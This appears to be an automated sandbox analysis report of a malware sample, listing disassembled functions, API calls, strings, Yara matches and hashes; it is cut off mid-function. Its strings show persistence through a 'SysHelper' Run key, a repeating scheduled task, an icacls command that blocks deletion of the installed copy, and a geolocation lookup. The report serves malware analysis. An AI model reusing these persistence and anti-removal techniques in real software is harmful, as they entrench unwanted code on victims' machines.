                                                                                      0x00402757
                                                                                      0x00000000
                                                                                      0x00402759
                                                                                      0x00402759
                                                                                      0x00402761
                                                                                      0x00402764
                                                                                      0x00402772
                                                                                      0x00402779
                                                                                      0x0040277e
                                                                                      0x00402780
                                                                                      0x00402783
                                                                                      0x00402784
                                                                                      0x00402788
                                                                                      0x0040278a
                                                                                      0x0040278f
                                                                                      0x00402791
                                                                                      0x004027b8
                                                                                      0x004027bd
                                                                                      0x004027bf
                                                                                      0x004027c1
                                                                                      0x004027c4
                                                                                      0x004027c7
                                                                                      0x004027ce
                                                                                      0x004027c9
                                                                                      0x004027c9
                                                                                      0x004027c9
                                                                                      0x004027d7
                                                                                      0x004027e4
                                                                                      0x004027e4
                                                                                      0x004027e9
                                                                                      0x00402793
                                                                                      0x00402793
                                                                                      0x00402797
                                                                                      0x0040279e
                                                                                      0x00402799
                                                                                      0x00402799
                                                                                      0x00402799
                                                                                      0x004027aa
                                                                                      0x004027aa
                                                                                      0x004027ee
                                                                                      0x004027ee
                                                                                      0x0040273f
                                                                                      0x0040273f
                                                                                      0x00402741
                                                                                      0x00402744
                                                                                      0x0040274c
                                                                                      0x0040274c

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 00402764
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00402779
                                                                                        • Part of subcall function 004044A8: _malloc.LIBCMT ref: 004044C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                      • String ID: DrJ
                                                                                      • API String ID: 4063778783-64114676
                                                                                      • Opcode ID: 9b220adb6656214d1221c7abb41ce7e52fa530132925c7769b607adfe025d8ac
                                                                                      • Instruction ID: 9475e751551338985df67bcd7dff80b697199ef852ffb477803c007f7dfa69e0
                                                                                      • Opcode Fuzzy Hash: 9b220adb6656214d1221c7abb41ce7e52fa530132925c7769b607adfe025d8ac
                                                                                      • Instruction Fuzzy Hash: CFE02B7141050CAACB08F6A0C906AEF726CEF11315F60067F9032E20C1DBF88608866C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Analysis Process: NZPC0PFaC0.exe PID: 752 Parent PID: 4332 NZPC0PFaC0.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 00419F90, Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                        • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                        • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                      • GetLastError.KERNEL32 ref: 00419FD2
                                                                                      • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                      • GetLastError.KERNEL32 ref: 00419FE4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,005ED868,?), ref: 0041A0BB
                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                      • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                        • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                        • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                        • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                      • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                      • API String ID: 2957410896-3144399390
                                                                                      • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                      • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                      • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                      • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040D240, Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                      • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                      • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                      • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                      • API String ID: 2496729271-1738591096
                                                                                      • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                      • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040CF10, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0040CF4A
                                                                                      • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                      Strings
                                                                                      • "country_code":", xrefs: 0040CFE1
                                                                                      • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                      • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                      • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                      • API String ID: 1485416377-2962370585
                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00411CD0, Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                      • _memset.LIBCMT ref: 00411D3B
                                                                                      • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                      • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                      • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                      • lstrcpyW.KERNEL32 ref: 00411ECE
                                                                                      • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                      • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                      • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                      • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                      • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                      • _memset.LIBCMT ref: 00412090
                                                                                      • lstrcpyW.KERNEL32 ref: 004120AA
                                                                                      • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                      • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                      • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                      • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                      • _memset.LIBCMT ref: 00412120
                                                                                      • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                      • lstrcpyW.KERNEL32 ref: 00412158
                                                                                      • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                      • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                      • API String ID: 2589766509-1182136429
                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412220, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                      • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                      • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                      • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                      • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                      • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                      • API String ID: 3668891214-3807497772
                                                                                      • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                      • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00423576, Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004235B1
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                      • __gmtime64_s.LIBCMT ref: 00423680
                                                                                      • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                      • __allrem.LIBCMT ref: 004236F3
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                      • __allrem.LIBCMT ref: 00423726
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                      • __allrem.LIBCMT ref: 0042375B
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                      • __invoke_watson.LIBCMT ref: 004237EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                      • String ID:
                                                                                      • API String ID: 384356119-0
                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00427B0B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                        • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                        • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                      • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                      • String ID: i;B
                                                                                      • API String ID: 2427264223-472376889
                                                                                      • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                      • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                      • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                      • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0042FB64, Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __lock.LIBCMT ref: 0042FB7B
                                                                                        • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                        • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                      • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                        • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                        • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                        • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                        • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                        • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                        • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                      • String ID:
                                                                                      • API String ID: 360932542-0
                                                                                      • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                      • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                      • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                      • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00427F3D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _doexit.LIBCMT ref: 00427F47
                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                                                      • String ID:
                                                                                      • API String ID: 3712619029-0
                                                                                      • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                      • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00410FC0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                      • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                      • _memset.LIBCMT ref: 004110CA
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                      • _malloc.LIBCMT ref: 00411100
                                                                                      • _memset.LIBCMT ref: 0041110B
                                                                                      • _sprintf.LIBCMT ref: 0041112E
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 2451520719-213608013
                                                                                      • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                      • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00411900, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32 ref: 00411915
                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
